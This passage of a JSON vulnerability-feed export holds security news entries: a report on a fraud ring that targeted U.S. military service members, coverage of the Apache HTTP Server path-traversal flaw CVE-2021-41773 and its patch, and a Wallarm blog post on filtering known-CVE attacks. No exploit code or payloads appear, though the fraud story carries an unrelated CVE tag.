"https://threatpost.com/neiman-marcus-customers-breach/175284/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-05T20:16:39", "description": "More than 3,300 U.S. military service members, military dependents and civilians employed by the Department of Defense were compromised as part of a transnational cybercrime ring created to defraud them out of $1.5 million in military benefits from the DoD and the Department of Veterans Affairs.\n\nA former civilian medical records technician and administrator with the U.S. Army was at the center of the scheme, according to court documents filed in the U.S. District Court for the Western District of Texas. Fredrick Brown, a Las Vegas resident, was sentenced to 12 and a half years in prison last week, after admitting that between July 2014 and September 2015, he stole personally identifiable information (PII) for thousands of people.\n\nIn his capacity as a records technician, Brown had access to a military electronic health records database. He admitted that he took screenshots to pilfer names, Social-Security numbers, military ID numbers, dates of birth and contact information from the victims.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nHe sent the information to a Philippines-based co-defendant, Robert Wayne Boling Jr., he said. Boling and associates then used the data to access DoD and benefits sites and steal millions of dollars, according to the court documents.\n\nAs part of its nefarious work, the ring particularly targeted disabled veterans, who were selected because they were eligible for more service-related benefits, court officials said.\n\n\u201cThe defendant brazenly preyed on and victimized U.S. servicemembers and veterans, many of whom were disabled and elderly,\u201d said U.S. Attorney Ashley C. Hoff for the Western District of Texas, in a [media statement](<https://www.justice.gov/opa/pr/former-army-contractor-receives-151-month-sentence-fraud-scheme-targeting-thousands-us>). \u201cAs part of our mission, we strive to protect these honorable men and women from fraud and abuse. If fraudsters target our servicemembers and veterans, we will seek to identify them and hold them accountable. This office will continue to zealously investigate and prosecute perpetrators of these schemes.\u201d\n\nIn addition to 151 months of prison time, Chief Judge Orlando Garcia ordered Brown to pay $2.3 million in restitution. He\u2019ll also be placed on supervised release for three years after he gets out.\n\n\u201cRather than honoring those servicemembers and veterans who sacrifice for them, the defendant and his co-conspirators targeted and stole from these brave men and women in a years-long fraud scheme,\u201d said Acting Assistant Attorney General Brian Boynton of the Justice Department\u2019s Civil Division. \u201cSuch conduct is an affront to the United States and will not be tolerated.\u201d\n\nThe efforts to bring the ring\u2019s participants to justice are ongoing: In July 2020, Garcia sentenced Brown co-defendant and accomplice Trorice Crawford to 46 months in federal prison, a fine of $103,700 and a three-year supervised release post-jail. Brown worked with Crawford to recruit money mules \u2014 individuals who would deposit the stolen funds into their bank accounts and then send the funds through international wire remittance services to the fraudsters in a money-laundering operation, according to the court..\n\nU.S. service members have been victims of PII exposure in the past. In May for example, a database filled with the medical records of nearly 200,000 U.S. military veterans was exposed online by a vendor working for the VA, and an analyst found that it might have been [exfiltrated by ransomware attackers](<https://threatpost.com/veterans-medical-records-ransomware/166025/>).\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-04T15:22:32", "type": "threatpost", "title": "Transnational Fraud Ring Bilks U.S. Military Service Members Out of Millions", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-04T15:22:32", "id": "THREATPOST:5F0369916D5AFC90C3AF027AC4EC4A61", "href": "https://threatpost.com/transnational-fraud-military-members/175298/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-08T11:24:43", "description": "Apache Software has quickly issued a fix for a zero-day security bug in the Apache HTTP Server, which was first reported to the project last week. The vulnerability is under active exploitation in the wild, it said, and could allow attackers to access sensitive information.\n\nAccording to a [security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) issued on Monday, the issue (CVE-2021-41773) could allow path traversal and subsequent file disclosure. Path traversal issues allow unauthorized people to access files on a web server, by tricking either the web server or the web application running on it into returning files that exist outside of the web root folder.\n\nThe vulnerability is rated Important, with a CVSS score of 5.1 out of 10.\n\nIn this case, the issue affects only version 2.4.49 of Apache\u2019s open-source web server, which offers cross-platform operability with all modern operating systems, including UNIX and Windows.\n\n\u201cA flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49,\u201d according to the advisory. \u201cAn attacker could use a path-traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \u2018require all denied,\u2019 these requests can succeed.\u201d\n\nThe bug could also expose the source of interpreted files like CGI scripts, the advisory added, which which may contain sensitive information that attackers can exploit for further attacks.\n\nResearchers such as the offensive team at Positive Technologies quickly created proof-of-concept exploits verifying the attack path, so expect more attack avenues to be availably publicly soon:\n\nhttps://twitter.com/ptswarm/status/1445376079548624899\n\nTenable [noted that](<https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited>) a Shodan search on Tuesday turned up about 112,000 Apache HTTP Servers that are confirmed to be running the vulnerable version, including 43,000 or so in the U.S.\n\n\u201cHowever, other vulnerable web servers might be configured to not display version information,\u201d according to the firm\u2019s blog.\n\nUsers can protect themselves by upgrading to version 2.4.50. It should be noted that \u201crequire all denied\u201d (which denies access to all requests) is the default for protecting documents outside of the web root, [researchers have reported](<https://twitter.com/damian_89_/status/1445388530130227208>) \u2013 which mitigates the issue.\n\nApache credited Ash Daulton and the cPanel Security Team for reporting the bug.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-10-05T20:01:27", "type": "threatpost", "title": "Apache Web Server Zero-Day Actively Exploited, Exposes Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-05T20:01:27", "id": "THREATPOST:641CEDBD77D5E4711F6E56353D7B5E33", "href": "https://threatpost.com/apache-web-server-zero-day-sensitive-data/175340/", "cvss": {"score": 0.0, "vector": "NONE"}}], "wallarmlab": [{"lastseen": "2021-12-07T18:39:22", "description": "Attacks against known vulnerabilities are one of the most common security risks. Have you seen an updated OWASP Top-10? A risk that used to be **A09 Using Components with Known Vulnerabilities** is now titled **A06:2021-Vulnerable and Outdated Components**. This category moved up to #06 from #9 in 2017. We highlighted this in our [OWASP Top 10 2021 proposal](<https://lab.wallarm.com/owasp-top-10-2021-proposal-based-on-a-statistical-data/>) that we published earlier this year.\n\nWe all know: _patch management is hard. _For many reasons: backward compatibility, code refactoring overheads, testing, legacy code. Patches and updates are just hard to apply on time. A kind of challenge where [WAFs](<https://www.wallarm.com/product/cloud-waf>) and [API Security Platform](<https://www.wallarm.com/product/cloud-native-api-security>) products can be a perfect solution with their attack detection capabilities, virtual patches, and proactive vulnerability detection capabilities.\n\n## Known attacks vs. unknown attacks\n\nWallarm introduces the new feature to highlight known attacks:\n\n 1. Attacks against known vulnerabilities and CVEs that are associated with them.\n 2. Typical payloads and attack vectors that our team already saw in the wild.\n\nBy using new filters, you can filter out all the known attacks for your analysis that drastically decreases the number of events for analysis. You can exclude events that are more likely to be mass scanning and random testing and instead focus on some unique events and unusual attacks. It\u2019s also a great way to identify any potential false positives as it\u2019s highly unlikely that the output for the known attacks would have any of them. Just use this attack query to exclude all the typical/known attacks and get only unusual events:\n\n * attacks today !known\n\nFor example, one of our customers had ~1K attacks for the last 7 days -- but only 12 events that were not relying on the typical tooling/CVEs/scanning. A huge difference in the amount of data to analyze.\n\nOr another use case. Suppose you learn about some new CVE that is relevant to your tech stack. In that case, you can also instantly run a search query and check if there have been any exploitation attempts against your applications.\n\nNew feature is already deployed for the whole customer base. No updates and additional configuration are required. \n\n## See it in action\n\nThese are some examples of usage.\n\n**Chose between searching of all events, known or unknown attacks**\n\n * All attacks - see all the results\n * Known attacks (CVE) - attacks that are known to target CVEs or has typical payloads\n * Other attacks - not known attacks to keep 0days and potentially false positives\n\n\n**Search attacks by CVE **\n\nYou can search for the attacks that use some particular CVE:\n\n * attacks today known CVE-2021-41773\n\nOr if you like, find all the events that are related to any known CVE by using _known cve_ keywords:\n\n * attacks today known cve\nAttack details now includes CVE tags on the left side\n\n## New CVEs\n\nThe Wallarm team has added more than 1500 recent CVEs to the list and keeps updating the database every day. One of the objectives is that the team has to analyze all the new CVEs and introduce filters as soon as the public data on the CVE is published. Wallarm team also enumerates vulnerabilities backward by analysis of real attacks data to add filters for more known attacks and payloads seen in the wild.\n\nThe post [Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components](<https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-15T23:13:35", "type": "wallarmlab", "title": "Wallarm starts to highlight CVE to address OWASP Top-10 A6 Vulnerable and Outdated Components", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-15T23:13:35", "id": "WALLARMLAB:6D3FED0879553B4C47AD26ED1DEB5AEB", "href": "https://lab.wallarm.com/wallarm-starts-to-highlight-cve-to-address-owasp-top-10-a6-vulnerable-and-outdated-components/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}